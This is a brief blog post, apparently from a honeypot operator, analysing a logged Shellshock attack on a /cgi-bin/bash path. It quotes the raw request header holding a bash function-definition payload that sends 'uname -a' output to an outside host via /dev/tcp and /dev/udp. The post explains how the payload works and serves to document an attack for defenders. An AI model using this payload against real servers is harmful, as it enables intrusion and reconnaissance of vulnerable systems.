Donnerstag, 18. Juni 2015

Shellinjection attack: /dev/tcp/ -- bash echo

My Honeypot was attacked by
Jun 18 06:42:08 beeswarm [mypyfwa] 2015-06-18 06:42:08.029145 - - [17/Jun/2015:16:11:21 +0200] "GET /cgi-bin/bash HTTP/1.1" 404 529 "() { :;}; /bin/bash -c \"echo  > /dev/tcp/; /bin/uname -a > /dev/tcp/; echo > /dev/udp/\"" "() { :;}; /bin/bash -c \"echo  > /dev/tcp/; /bin/uname -a > /dev/tcp/; echo > /dev/udp/\"" DE SHELLinjection
So, what is happening here:
  1. I needed to ask the experts on what could be done via "> /dev/tcp/", the result is quite simple, a feature by the bash could lead to opening a tcp connection to port 21
  2. The attacker tried to report the vulnerability of my server to the ip address within the attack.
  3. He tried it via UDP and TCP
The source of the attack was: which is a server hosted by "1&1 Internet Inc."

The reporting destination was: which is a server hosted by the same company.